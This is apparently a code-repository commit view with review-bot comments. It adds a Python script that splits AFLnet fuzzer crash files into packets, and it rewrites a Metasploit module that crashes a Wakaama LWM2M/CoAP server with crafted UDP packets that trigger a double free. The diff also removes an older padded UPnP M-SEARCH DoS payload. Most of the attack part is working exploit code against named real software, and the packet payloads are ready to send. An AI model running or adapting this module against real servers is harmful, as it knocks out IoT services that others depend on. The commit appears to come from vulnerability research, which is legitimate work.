Commit 54173261 authored by poulpe's avatar poulpe

[Add] Comment in script + metasploit module

parent 4ad8e57f
import time
import socket
from typing import List
import sys
# def send_packet(sock : socket,data : List[bytes],addr : str = "127.0.0.1",port : int = 5683):
# # sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
# # sock.connect((addr,port))
# sock.send(data)
# def net_send(sock : socket.socket, buffer: list[bytes]):
# buffer_size = len(buffer)
# byte_count = 0
# print(buffer)
# while byte_count < buffer_size:
# # usleep(10);
# time.sleep(10 * 10**-6)
# byte_count += sock.send(buffer);
if __name__ == "__main__":
if len(sys.argv) < 1:
print(f"Usage: ./{sys.argv[0]} <file_aflnet_crash>")
file = open(sys.argv[1],"rb")
buf = ""
size = 0
data = file.read()
# print(":".join("{:02x}".format(c) for c in data))
length = 0
idx = 0
size = int.from_bytes(data[0:4],byteorder='little')
print(f"Packet size : {size}")
length = 0
cnt = 0
# sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
# host = socket.gethostbyname("localhost")
# sock.connect((host, 5683))
while size > 0:
# print(f"Length : {length}")
# print()
# print(":".join("{:02x}".format(c) for c in data[length:length + size]))
# print()
# print("Nbr of char : ",size)
# for i in range(0,size):
# # print(f"i : {i}", end=" ")
# try:
# print(chr(data[length+i]),end="")
# except:
# print("?")
# continue
# send_packet(sock,data[length:length+size])
# print(f"Len : {length}, size : {size}")
with open(f"{cnt}.raw","wb") as f:
f.write(data[length:length+size])
cnt += 1
# print()
# s = .decode('latin-1')
# s = str(data[length:length+size],'iso-8859-1')
# s = ''.join(map(chr, data[length+4:length + size]))
# print(s)
# print(":".join("{}".format(c.decode("ascii")) for c in data[length:length + size]))
# print()
# print(data[length:length + size].decode('iso-8859-1'))
# print("".join(ord(chr(c)) for c in data[length:length + size]))
# pkt = IP(dst="127.0.0.1")/UDP(sport=40564,dport=5683)/Raw(load=data[length:length + size])
# send(pkt)
length += size + 4
tmp_value_size = data[length:length+4]
# print("Size byte : ",":".join("{:02x}".format(c) for c in tmp_value_size))
size = int.from_bytes(tmp_value_size,byteorder='little')
if size == 0:
break
print(f"Packet size : {size}")
print("\n")
# sock.close()
# pkt = IP(dst="127.0.0.1")/UDP(dport=5683,sport=40564)/Raw(load=data[length:])
# send(pkt)
\ No newline at end of file
......@@ -2,6 +2,8 @@
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Author : Troller Fabian
# Description : Execute the DoS attack on the server
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::Udp
......@@ -9,84 +11,42 @@ class MetasploitModule < Msf::Auxiliary
def initialize(info = {})
super(update_info(info,
'Name' => 'Wakaama LWM2M 2023-03-31 Denial of Service (DoS) Exploit',
'Name' => 'Wakaama LWM2M/CoAP 2023-03-31 Denial of Service (DoS) Exploit',
'Description' => %q{
This module allows remote attackers to cause a denial of service (DoS)
in Wakaama server via a specifically crafted UDP request.
},
'Author' =>
[
'Troller Fabian' # Metasploit module
'Troller Fabian'
],
'License' => MSF_LICENSE,))
register_options(
[
Opt::RHOST("127.0.0.1"),
Opt::RPORT(5683),
OptInt.new('ATTEMPTS', [true, 'Max number of attempts to DoS the remote Wakaama ending', 3])
])
end
def send_probe(udp_sock, probe)
udp_sock.put(probe)
data = udp_sock.recvfrom
if data and not data[0].empty?
return data[0]
else
return nil
end
end
def run
# the M-SEARCH probe packet that tries to identify whether the service is up or not
msearch_probe = "M-SEARCH * HTTP/1.1\r\n"
msearch_probe << "Host:239.255.255.250:1900\r\n"
msearch_probe << "ST:upnp:rootdevice\r\n"
msearch_probe << "Man:\"ssdp:discover\"\r\n"
msearch_probe << "MX:3\r\n"
msearch_probe << "\r\n"
# the M-SEARCH packet that is being read line by line: there shouldn't be CRLF after the
# ST line
sploit = "M-SEARCH * HTTP/1.1\r\n"
sploit << "HOST: 239.255.255.250:1900\r\n"
sploit << "ST:uuid:schemas:device:MX:3"
# the packet can be at most 1500 bytes long, so add appropriate number of ' ' or '\t'
# this makes the DoS exploit more probable, since we're occupying the stack with arbitrary
# characters: there's more chance that the program will run off the stack.
sploit += ' '*(1500-sploit.length)
# Create data for packet1 and packet2
packet_1 = "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"
packet_2 = "RAIl3Nwl/8SycmQRKDlsd20ybT0xLjENBWVwPXRlc3Rsd20ybWNsaWVudJhiPVUGbHQhMzAw/zwvPjtydD0ib21hLmx3bTJtIiw8LzEvMD4sPC8zLzA+IjwvMzEwMjQvMTJtPTEuMQ0FZXA9dGVrdGx3bTJtY2xpZW50ADAyNA=="
# connect to the UDP port
connect_udp
print_status("#{rhost}:#{rport} - Checking UPnP...")
response = send_probe(udp_sock, msearch_probe)
if response.nil?
print_error("#{rhost}:#{rport} - UPnP end not found")
disconnect_udp
return
end
print_status("#{rhost}:#{rport} - Checking LWM2M...")
# response = send_probe(udp_sock, packet_1)
response = udp_sock.put(Base64.decode64(packet_1)) # Create client
(1..datastore['ATTEMPTS']).each { |attempt|
print_status("#{rhost}:#{rport} - UPnP DoS attempt #{attempt}...")
# send the exploit to the target
print_status("#{rhost}:#{rport} - Sending malformed packet...")
udp_sock.put(sploit)
# send the probe to the target
print_status("#{rhost}:#{rport} - The target should be unresponsive now...")
response = send_probe(udp_sock, msearch_probe)
if response.nil?
print_good("#{rhost}:#{rport} - UPnP unresponsive")
disconnect_udp
return
else
print_status("#{rhost}:#{rport} - UPnP is responsive still")
end
}
udp_sock.put(Base64.decode64(packet_2)) # Drop the load double free
disconnect_udp
print_status("Exploit finished for server : #{rhost}:#{rport}")
end
end
\ No newline at end of file
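Review bot: The rewritten module metadata in `initialize` (second hunk, from the new `'Name'` line through `'License' => MSF_LICENSE,))`) declares no `'DisclosureDate'`, `'References'` or `'Notes'`, so a user of the module has nothing to triage against; a module whose purpose is to take the service down should at least carry `'Notes' => { 'Stability' => [CRASH_SERVICE_DOWN], 'Reliability' => [], 'SideEffects' => [] }` and a reference to the upstream Wakaama report (placeholder: <ISSUE-OR-ADVISORY-URL>). In `run`, the value bound by `response = udp_sock.put(Base64.decode64(packet_1))` is the byte count `put` returns, not a reply, so the name misleads and the assignment should be dropped. The final `print_status("Exploit finished for server : #{rhost}:#{rport}")` runs unconditionally, so if the `send_probe` re-check does not survive on the new side the module reports completion without ever confirming the target stopped answering; keep a probe after the last packet or word the status as 'packets sent'. The `ATTEMPTS` option text reads 'remote Wakaama ending', presumably 'endpoint'.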
# Author : Troller Fabian
# Description : Script to segment the file create by AFLnet
# Date : 2023-07-03
import time
import socket
from typing import List
import sys
if __name__ == "__main__":
if len(sys.argv) < 1:
print(f"Usage: ./{sys.argv[0]} <file_aflnet_crash>")
exit(1)
file = open(sys.argv[1],"rb")
buf = ""
size = 0
data = file.read()
length = 0
idx = 0
# Get packet size for sending
size = int.from_bytes(data[0:4],byteorder='little')
print(f"Packet size : {size}")
length = 0
cnt = 1
while size > 0:
# Write to file the parsed data
with open(f"{cnt}.raw","wb") as f:
f.write(data[length:length+size])
cnt += 1
length += size + 4
tmp_value_size = data[length:length+4]
# Get packet size for sending
size = int.from_bytes(tmp_value_size,byteorder='little')
if size == 0:
break
print(f"Packet size : {size}")
print("\n")
return 0
\ No newline at end of file
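Review bot: `return 0` on the last line of the new script sits directly under `if __name__ == "__main__":`, which is module scope rather than a function, so the file fails to compile with "'return' outside function" before any segmenting happens; use `sys.exit(0)` or drop the line. The usage guard `if len(sys.argv) < 1:` can never be true because `sys.argv[0]` is always present, so a missing argument falls through to `open(sys.argv[1],"rb")` and dies with an IndexError; it should be `if len(sys.argv) < 2:`, and the bare `exit(1)` below it should be `sys.exit(1)` since `exit` is the interactive site helper. The crash file opened into `file` is never closed; reading it inside a `with` block would fix that. The `buf`, `idx` and the first `length = 0` assignments are unused and could go.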